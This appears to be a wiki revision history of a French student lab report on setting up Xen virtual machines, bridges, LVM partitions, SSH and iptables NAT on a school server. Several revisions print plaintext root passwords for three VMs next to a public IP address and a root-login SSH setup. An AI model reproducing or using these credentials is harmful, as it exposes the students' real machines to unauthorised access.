SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight>Ensuite sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machie en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11508
Atelier SysRes SE4 2025/2026 E5
2026-01-27T14:59:14Z
<p>Cpayet : /* Nos résultats : */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.162<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11495
Atelier SysRes SE4 2025/2026 E5
2026-01-27T14:37:42Z
<p>Cpayet : /* Nos résultats : */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.162<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11459
Atelier SysRes SE4 2025/2026 E5
2026-01-27T13:48:34Z
<p>Cpayet : /* Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
